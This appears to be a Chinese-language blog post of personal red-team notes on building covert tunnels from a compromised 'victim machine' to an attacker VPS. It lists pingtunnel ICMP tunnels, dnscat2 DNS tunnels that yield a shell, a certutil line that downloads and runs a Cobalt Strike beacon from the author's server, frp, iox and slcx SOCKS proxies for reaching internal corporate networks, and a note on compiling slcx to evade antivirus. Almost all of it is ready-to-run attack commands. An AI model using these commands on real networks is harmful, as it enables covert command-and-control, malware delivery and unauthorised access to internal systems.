---
title: 内网隧道搭建
date: 2023-01-11 15:11:40 +0800
categories: 
tags: 
permalink: /posts/id=79/
pin: false
published:
---
## ICMP隧道
```shell
# VPS
sudo ./pingtunnel -type server -key 000000


# 受害机
pingtunnel.exe -type client -l 127.0.0.1:2222 -s 150.158.144.112 -t 150.158.144.112:3333 -tcp 1  -key 000000

# 建立隧道从受害机的2222端口到VPS的3333端口，隧道内通过ICMP传输


# 接入CS
CS🐎设置为反弹到受害机2222端口，这样就能通过隧道传回shell
创建2个监听器icmp_port/cs_port，生成一个反弹到受害机2222端口的beacon
受害机执行beacon.exe即可上线


# 进一步可以实现内网穿透(任意使用公司内网)
省略 搭建ICMP TCP隧道
# 受害机 将受害机的网络环境socks5代理到受害机2222端口，2222是隧道入口，iox 代理的 Socks 流量将通过 ICMP 隧道出网
.\iox.exe proxy -r 127.0.0.1:2222  #先操作


# VPS 将VPS3333端口收到的流量转发到4444端口
./iox proxy -l 3333 -l 4444

# 通过 proxifier 代理 socks 流量， VPS4444端口  实现本机访问内网

# tips


# -noprint 1 -nolog 1

#pingtunnel.exe -type client -l :[转发本机2222端口作为ICMP隧道通讯端口] -s [服务端IP] -[转发类型] 1 -noprint 1 -nolog 1
```


## DNS隧道搭建

```shell
# 配置域名解析
ns1 A 150.158.144.112
log ns ns1.e4l4.com
# 开启VPS TCP UDP 53端口放行
# test  VPS:sudo tcpdump -n -i eth0 udp dst port 53   受害机：nslookup log.e4l4.com

# 关闭DNS解析服务
sudo service systemd-resolved stop
# sudo service systemd-resolved start
sudo ruby dnscat2.rb log.e4l4.com -c 000000

.\dnscat2-v0.07-client-win32.exe --secret=000000 log.e4l4.com --delay 5000



# 接CS
# 建立DNS隧道，同时获取shell
# VPS端
sudo ruby ./dnscat2.rb log.e4l4.com -e open -c 000000 --no-cache
# 受害者端
.\dnscat2-v0.07-client-win32.exe --secret=000000 log.e4l4.com --delay 5000

# VPS端
session -i 1
shell //获取真shell
session -i 2 

# 把生成的beacon.exe(反弹到VPS3333端口)放到VPS上，用python开http
python3 -m http.server 4444
# 在已有的shell里下载
certutil.exe -urlcache -split -f http://e4l4.com:4444/beacon_x64.exe C:\Users\Public\beacon.exe

C:\Users\Public\beacon.exe
```

## ssh隧道（纯内网目标机）

需要跳板机

```shell
# VPS增加ssh端口转发
sudo vim /etc/ssh/sshd_config

GatewayPorts no改成yes

sudo systemctl restart sshd.service
```


## vpn隧道

### cs自带的vpn隧道

似乎只能工作在windows server 上
操作文章：
https://xz.aliyun.com/t/12500?time__1311=mqmhD50IZD8D%2FD0lD2DUo4fobK%3D0Q5F%3DF4D&alichlgref=https%3A%2F%2Fwww.google.com.hk%2F#toc-2

### Openvpn

## Socks代理
有socks4和5两种类型，socks4只支持TCP协议而socks 5支持TCP/UDP协议，还支持各种身份认证机制等协议

Iox
```bash
# VPS
./iox proxy -l 9999 -l 3333

# 受害机
iox.exe proxy -r e4l4.com:9999


连接e4l4.com:3333即可
```


Frp 
frps完整配置：https://github.com/fatedier/frp/blob/dev/conf/frps_full_example.toml
frpc完整配置：https://github.com/fatedier/frp/blob/dev/conf/frpc_full_example.toml
```bash
# VPS 绑定IP默认为本机，监听7000端口
nohup ./frps -c frps.toml >/dev/null 2>&1 &
# frps.toml
bindPort = 7000
# 受害机
nohup ./frpc -c frpc.toml >/dev/null 2>&1 &
# frpc.toml
serverAddr = "150.158.144.112"
serverPort = 7000
# 添加的Socks5代理配置
[[proxies]]
name = "socks5_proxy"  # Socks5代理的名称
type = "tcp"
remotePort = 3333      # Socks5代理的远程端口，可以根据需要更改
plugin = "socks5"
# plugin_user = "your_username"  # 如果需要用户名和密码认证，取消这两行的注释并设置用户名和密码
# plugin_passwd = "your_password"

连接e4l4.com:3333即可
```


## Slcx端口转发(iox平替)

```shell
# 免杀编译
# windows端
# 可修改文件里的密钥
$env:GOOS="windows"; $env:GOARCH="amd64"; go build -ldflags="-s -w" -o e4l4.exe


go build -ldflags="-s -w" -o 



# VPS端 将受害机发送到4443的流量转发到4444端口
./slcx :4443 0.0.0.0:4444 --laoban


# 将受害本机的22端口转发到VPS上的4443端口
.\slcx.exe 127.0.0.1:22 150.158.144.112:4443 --niuma
```












